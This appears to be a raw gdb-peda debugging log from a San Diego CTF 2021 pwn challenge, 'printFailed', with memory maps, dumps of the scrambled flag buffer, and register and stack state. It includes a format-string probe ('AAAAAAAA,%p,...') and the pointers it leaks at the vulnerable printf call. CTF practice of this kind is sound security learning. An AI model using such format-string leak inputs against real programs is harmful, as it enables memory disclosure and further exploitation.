
gdb-peda$ vmmap
Start              End                Perm	Name
0x0000555555554000 0x0000555555555000 r-xp	/home/mito/CTF/San_Diego_CTF_2021/Pwn_printFAILED/printFailed
0x0000555555754000 0x0000555555755000 r--p	/home/mito/CTF/San_Diego_CTF_2021/Pwn_printFAILED/printFailed
0x0000555555755000 0x0000555555756000 rw-p	/home/mito/CTF/San_Diego_CTF_2021/Pwn_printFAILED/printFailed
0x0000555555756000 0x0000555555777000 rw-p	[heap]
0x00007ffff79e2000 0x00007ffff7bc9000 r-xp	/lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff7bc9000 0x00007ffff7dc9000 ---p	/lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff7dc9000 0x00007ffff7dcd000 r--p	/lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff7dcd000 0x00007ffff7dcf000 rw-p	/lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff7dcf000 0x00007ffff7dd3000 rw-p	mapped
0x00007ffff7dd3000 0x00007ffff7dfc000 r-xp	/lib/x86_64-linux-gnu/ld-2.27.so
0x00007ffff7fd5000 0x00007ffff7fd7000 rw-p	mapped
0x00007ffff7ff7000 0x00007ffff7ffa000 r--p	[vvar]
0x00007ffff7ffa000 0x00007ffff7ffc000 r-xp	[vdso]
0x00007ffff7ffc000 0x00007ffff7ffd000 r--p	/lib/x86_64-linux-gnu/ld-2.27.so
0x00007ffff7ffd000 0x00007ffff7ffe000 rw-p	/lib/x86_64-linux-gnu/ld-2.27.so
0x00007ffff7ffe000 0x00007ffff7fff000 rw-p	mapped
0x00007ffffffde000 0x00007ffffffff000 rw-p	[stack]
0xffffffffff600000 0xffffffffff601000 r-xp	[vsyscall]

gdb-peda$ x/80gx 0x0000555555755000
0x555555755000:	0x0000000000000000	0x0000555555755008
0x555555755010 <FLAG_LEN>:	0x0000000000000028	0x0000000000000000
0x555555755020 <stdout@@GLIBC_2.2.5>:	0x00007ffff7dce760	0x0000000000000000
0x555555755030 <stdin@@GLIBC_2.2.5>:	0x00007ffff7dcda00	0x0000000000000000
0x555555755040 <guess>:	0x0000000000000000	0x0000000000000000
0x555555755050 <guess+16>:	0x0000000000000000	0x0000000000000000
0x555555755060 <guess+32>:	0x0000000000000000	0x0000000000000000
0x555555755070:	0x0000000000000000	0x0000000000000000
0x555555755080 <flag>:	0x3232327c68626d67	0x3232323232323232
0x555555755090 <flag+16>:	0x7e32323232323232	0x010101010101010b
0x5555557550a0 <flag+32>:	0x0001010101010101	0x0000000000000000
0x5555557550b0:	0x0000000000000000	0x0000000000000000
0x5555557550c0:	0x0000000000000000	0x0000000000000000


mito@ubuntu:~/CTF/San_Diego_CTF_2021/Pwn_printFAILED$ ./printFailed 
can you guess the scrambled flag?
AAAAAAAA,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p
you guessed: 
AAAAAAAA,0x55555555486f,0x55555555482a,0x28,0x555555755080,0x7ffff7fd64c0,0x7fffffffdf38,0x155554720,0x7fffffffdf30,0x555555756260,0x555555554960,wrong


[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x0 
RCX: 0x28 ('(')
RDX: 0x55555555482a (<scramble>:	push   rbp)
RSI: 0x55555555486f (<main>:	push   rbp)
RDI: 0x555555755040 ("AAAAAAAA,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,")
RBP: 0x7fffffffddd0 --> 0x555555554960 (<__libc_csu_init>:	push   r15)
RSP: 0x7fffffffddb0 --> 0x7fffffffdeb8 --> 0x7fffffffe1e6 ("/home/mito/CTF/San_Diego_CTF_2021/Pwn_printFAILED/printFailed")
RIP: 0x555555554922 (<main+179>:	call   0x5555555546c0 <printf@plt>)
R8 : 0x555555755080 ("gmbh|", '2' <repeats 18 times>, "~\v", '\001' <repeats 14 times>)
R9 : 0x7ffff7fd64c0 (0x00007ffff7fd64c0)
R10: 0x555555756010 --> 0x0 
R11: 0x246 
R12: 0x555555554720 (<_start>:	xor    ebp,ebp)
R13: 0x7fffffffdeb0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x55555555490f <main+160>:	lea    rsi,[rip+0xffffffffffffff59]        # 0x55555555486f <main>
   0x555555554916 <main+167>:	lea    rdi,[rip+0x200723]        # 0x555555755040 <guess>
   0x55555555491d <main+174>:	mov    eax,0x0
=> 0x555555554922 <main+179>:	call   0x5555555546c0 <printf@plt>
   0x555555554927 <main+184>:	lea    rsi,[rip+0x200752]        # 0x555555755080 <flag>
   0x55555555492e <main+191>:	lea    rdi,[rip+0x20070b]        # 0x555555755040 <guess>
   0x555555554935 <main+198>:	call   0x5555555546e0 <strcmp@plt>
   0x55555555493a <main+203>:	test   eax,eax
Guessed arguments:
arg[0]: 0x555555755040 ("AAAAAAAA,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,")
arg[1]: 0x55555555486f (<main>:	push   rbp)
arg[2]: 0x55555555482a (<scramble>:	push   rbp)
arg[3]: 0x28 ('(')
arg[4]: 0x555555755080 ("gmbh|", '2' <repeats 18 times>, "~\v", '\001' <repeats 14 times>)
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffddb0 --> 0x7fffffffdeb8 --> 0x7fffffffe1e6 ("/home/mito/CTF/San_Diego_CTF_2021/Pwn_printFAILED/printFailed")
0008| 0x7fffffffddb8 --> 0x155554720 
0016| 0x7fffffffddc0 --> 0x7fffffffdeb0 --> 0x1 
0024| 0x7fffffffddc8 --> 0x555555756260 --> 0xfbad2488 
0032| 0x7fffffffddd0 --> 0x555555554960 (<__libc_csu_init>:	push   r15)
0040| 0x7fffffffddd8 --> 0x7ffff7a03bf7 (<__libc_start_main+231>:	mov    edi,eax)
0048| 0x7fffffffdde0 --> 0x1 
0056| 0x7fffffffdde8 --> 0x7fffffffdeb8 --> 0x7fffffffe1e6 ("/home/mito/CTF/San_Diego_CTF_2021/Pwn_printFAILED/printFailed")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0000555555554922 in main ()
gdb-peda$ 


gdb-peda$ x/80gx 0x7fffffffdd00
0x7fffffffdd00:	0x0000000000000d68	0x000000000000000e
0x7fffffffdd10:	0x00005555557574a0	0x00007ffff7a6f021
0x7fffffffdd20:	0x0000000000000021	0x00007ffff7dce760
0x7fffffffdd30:	0x000000000000000a	0x0000555555554a1a
0x7fffffffdd40:	0x00007ffff7dca2a0	0x0000000000000000
0x7fffffffdd50:	0x0000000000000000	0x00007ffff7a6f4d3
0x7fffffffdd60:	0x000000000000000d	0x00007ffff7dce760
0x7fffffffdd70:	0x0000555555554a1a	0x00007ffff7a62c42
0x7fffffffdd80:	0x0000000000000000	0x0000000000000000
0x7fffffffdd90:	0x00007fffffffddd0	0x0000555555554720
0x7fffffffdda0:	0x00007fffffffdeb0	0x00005555555548f9
0x7fffffffddb0:	0x00007fffffffdeb8	0x0000000155554720
0x7fffffffddc0:	0x00007fffffffdeb0	0x0000555555756260
0x7fffffffddd0:	0x0000555555554960	0x00007ffff7a03bf7
0x7fffffffdde0:	0x0000000000000001	0x00007fffffffdeb8
0x7fffffffddf0:	0x0000000100008000	0x000055555555486f
0x7fffffffde00:	0x0000000000000000	0x90480e48aead1e67
0x7fffffffde10:	0x0000555555554720	0x00007fffffffdeb0
0x7fffffffde20:	0x0000000000000000	0x0000000000000000
0x7fffffffde30:	0xc51d5b1d87ad1e67	0xc51d4ba24b331e67
0x7fffffffde40:	0x00007fff00000000	0x0000000000000000
0x7fffffffde50:	0x0000000000000000	0x00007ffff7de38d3
0x7fffffffde60:	0x00007ffff7dc9638	0x00000000208148e9
0x7fffffffde70:	0x0000000000000000	0x0000000000000000
0x7fffffffde80:	0x0000000000000000	0x0000555555554720
0x7fffffffde90:	0x00007fffffffdeb0	0x000055555555474a
0x7fffffffdea0:	0x00007fffffffdea8	0x000000000000001c
0x7fffffffdeb0:	0x0000000000000001	0x00007fffffffe1e6
0x7fffffffdec0:	0x0000000000000000	0x00007fffffffe224
0x7fffffffded0:	0x00007fffffffe810	0x00007fffffffe832
0x7fffffffdee0:	0x00007fffffffe841	0x00007fffffffe852
